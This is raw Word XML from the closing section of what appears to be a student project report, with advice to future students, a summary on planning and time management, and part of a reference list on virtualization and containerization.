        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Being composed </w:t>
      </w:r>
      <w:r w:rsidR="00421FCD">
        <w:t xml:space="preserve">and staying focused </w:t>
      </w:r>
      <w:r w:rsidR="00A54108">
        <w:t xml:space="preserve">has helped the author </w:t>
      </w:r>
      <w:r w:rsidR="00D73FAF">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00A54108">
        <w:t>finish the project within the given time frame</w:t>
      </w:r>
      <w:r w:rsidR="006D2F34">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA006FC" w14:textId="62502D3B" w:rsidR="00922EAC" w:rsidRDefault="00D73FAF" w:rsidP="00922EAC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466866">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Guidance to the future students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E42BC4" w14:textId="339DE313" w:rsidR="00466866" w:rsidRDefault="00466866" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Find the research topic </w:t>
      </w:r>
      <w:r w:rsidR="00464A22">
        <w:t>at the very beginning</w:t>
      </w:r>
      <w:r w:rsidR="00DD4526">
        <w:t xml:space="preserve"> as the time allocated is very tight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1D1E5A" w14:textId="4F921D93" w:rsidR="00DD4526" w:rsidRDefault="00DD4526" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Establish good planning and </w:t>
      </w:r>
      <w:r w:rsidR="0038016D">
        <w:t>time management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F907F1B" w14:textId="440E39AC" w:rsidR="00B41D3F" w:rsidRDefault="00B41D3F" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify and prioritise tasks accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97D2A3" w14:textId="6B3E25C5" w:rsidR="0038016D" w:rsidRDefault="0038016D" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Communicate and collaborate with your project supervisor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72384D" w14:textId="77777777" w:rsidR="0038016D" w:rsidRDefault="0038016D" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Adhere and give attention to the advice given by your supervisor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1154C5" w14:textId="77777777" w:rsidR="0055661C" w:rsidRDefault="0055661C" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stick to the plan and stay purposeful throughout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3BDDBE" w14:textId="0F1197D0" w:rsidR="0038016D" w:rsidRDefault="008B5B7A" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Divide the project into small phases and units to stay on track.</w:t>
      </w:r>
      <w:r w:rsidR="0038016D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF019C7" w14:textId="77777777" w:rsidR="00467AC5" w:rsidRDefault="00242675" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stay organised and energetic to reach the project’s objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F9D1DE" w14:textId="41219F47" w:rsidR="00242675" w:rsidRDefault="00211F57" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Team up to work with other students and never</w:t>
      </w:r>
      <w:r w:rsidR="00B76E5C">
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> afraid to ask for help from other people.</w:t>
      </w:r>
      <w:r w:rsidR="00242675">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE7C899" w14:textId="72CA995A" w:rsidR="00211F57" w:rsidRDefault="00211F57" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Always stick to the laws and regulations of the university. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616A0622" w14:textId="41E831DF" w:rsidR="00211F57" w:rsidRDefault="00211F57" w:rsidP="00466866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Attend meeting</w:t>
      </w:r>
      <w:r w:rsidR="00B76E5C">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with your supervisor regularly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAABA75" w14:textId="77777777" w:rsidR="00146DD2" w:rsidRDefault="00146DD2" w:rsidP="00B41D3F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284C97E8" w14:textId="399AA4A2" w:rsidR="00B41D3F" w:rsidRDefault="00B41D3F" w:rsidP="00B41D3F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B41D3F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Summary </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9AF09E" w14:textId="108B22EB" w:rsidR="00B41D3F" w:rsidRDefault="00146DD2" w:rsidP="00B41D3F">
      <w:r>
        <w:t>Adding new skills is essential to further your knowledge and opens new opportunities</w:t>
      </w:r>
      <w:r w:rsidR="00B76E5C">
        <w:t xml:space="preserve"> and thus should be acquired and enriched.</w:t>
      </w:r>
      <w:r w:rsidR="006D1D23">
        <w:t xml:space="preserve"> The key to the success of any project is having effective </w:t>
      </w:r>
      <w:r w:rsidR="006D1D23">
        <w:lastRenderedPageBreak/>
        <w:t>planning and time management</w:t>
      </w:r>
      <w:r w:rsidR="00CC174F">
        <w:t xml:space="preserve"> along </w:t>
      </w:r>
      <w:r w:rsidR="006D1D23">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00CC174F">
        <w:t>having</w:t>
      </w:r>
      <w:r w:rsidR="00292D12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC174F">
        <w:t>reliable</w:t>
      </w:r>
      <w:r w:rsidR="00292D12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC174F">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00292D12">
        <w:t xml:space="preserve"> adequate resources.</w:t>
      </w:r>
      <w:r w:rsidR="000110A8">
        <w:t xml:space="preserve"> Regardless of its size, any project can fail without proper coordination and time management. Therefore, it is vital to religiously study and make plans to the smallest detail to achieve any project’s aims.</w:t>
      </w:r>
      <w:r w:rsidR="00CC174F">
        <w:t xml:space="preserve"> Finally,</w:t>
      </w:r>
      <w:r w:rsidR="00542CE4">
        <w:t xml:space="preserve"> it is critical to stay motivated and determined to accomplish and produce high-standard work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C73A35" w14:textId="2A10DCDF" w:rsidR="00AF513B" w:rsidRDefault="00AF513B" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="63F613C7" w14:textId="72619F0B" w:rsidR="00AF513B" w:rsidRDefault="00AF513B" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="261F5C76" w14:textId="1C2AF143" w:rsidR="00AF513B" w:rsidRDefault="00AF513B" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="36765B60" w14:textId="3C014D70" w:rsidR="00AF513B" w:rsidRDefault="00AF513B" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="190494A3" w14:textId="5FC6E79C" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="6CB046ED" w14:textId="419DEA95" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="623D32F7" w14:textId="60D90997" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="0151DA39" w14:textId="3C2D738E" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="36B6E6EE" w14:textId="21C5FD52" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="439409DB" w14:textId="214AF2F3" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="53570654" w14:textId="4C9AAB3E" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="64A8447C" w14:textId="26583685" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="21304E41" w14:textId="5536E775" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="365A5729" w14:textId="42CE89B3" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="08856EA6" w14:textId="01F288E3" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="507A10E1" w14:textId="75E66C37" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="23D28114" w14:textId="5DAEA2EC" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="0FAD1C97" w14:textId="7F2E930F" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:p w14:paraId="444A864E" w14:textId="77777777" w:rsidR="00CB1BFF" w:rsidRDefault="00CB1BFF" w:rsidP="00B41D3F"/>
    <w:bookmarkStart w:id="235" w:name="_Toc87032953" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="1706448841"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="27C3064C" w14:textId="5B4C30F6" w:rsidR="00A13BEC" w:rsidRDefault="00C748CB" w:rsidP="00900794">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r>
            <w:t>REFERENCES</w:t>
          </w:r>
          <w:bookmarkEnd w:id="235"/>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-573587230"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w14:paraId="5BC7D417" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">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A13BEC" w14:paraId="5500C851" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3E4A429D" w14:textId="321E9F08" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="41EA4FB6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>B. Wootton, “Contino,” Contino, 31 January 2017. [Online]. Available: https://www.contino.io/insights/whos-using-docker. [Accessed 21 October 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2B9B4598" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1A11A50B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[2] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="31F553C4" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">R. Kumar and S. Charu, “An Importance of Using Virtualization Technology in Cloud Computing,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Global Journal of Computers &amp; Technology, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 1, no. 2, pp. 56-60, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="34151C3D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7EC9A551" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[3] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="18D8111C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Mondesire, A. Angelopoulou, S. Sirigampola and et.al, “Combining Virtualization and Containerization to support interactive games and simulations on the cloud,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Simulation Modelling Practice and Theory, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 93, pp. 233-244, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1E2262CC" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="28E92B6D" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[4] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1433B138" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">B. Đorđević, V. Timčenko, E. Nikolić and N. Davidović, “Comparing Performances of Native Host and Virtualization on ESXi hypervisor,” in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>20th International Symposium INFOTEH-JAHORINA (INFOTEH)</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, East Sarajevo, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="63A6CE3A" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="28350174" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[5] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="148594B6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. R. Poojara, N. V. Dharwadkar and V. Ghule, “Performance Benchmarking of Hypervisors - A Case Study,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Indian Journal of Science and Technology, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 10, no. 44, pp. 1-11, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4D033C95" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1142652F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[6] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3B3074F2" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Bhardwaj and C. Krishna, “Virtualization in Cloud Computing: Moving from Hypervisor to Containerization—A Survey,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Arabian Journal for science and Engineering, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 2, no. 3, pp. 1-17, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3D1DAE61" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="103803B6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[7] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4FF31FF4" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">G. Radchenko, A. Alaasam and A. Tchernykh, “Comparative Analysis of Virtualization Methods In Big Data Processing,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Supercomputing Frontiers and Innovations, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 6, no. 1, pp. 48-79, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1F3E7970" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="36B797CE" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[8] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3C478823" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Samani, C. Denninnart, J. Bacik and et.al, “The Art of CPU-Pinning: Evaluating and Improving the Performance of Virtualization and Containerization Platforms,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">arXiv preprint arXiv:2006.02055, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 4, no. 2, pp. 1-11, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2A8CEB1D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3AC5858B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[9] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="46A106C1" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">O. Bentaleb, A. Belloum, A. Sebaa and e. al, “Containerization technologies: taxonomies, applications and challenges,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">The Journal of Supercomputing, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-38, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4673A784" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
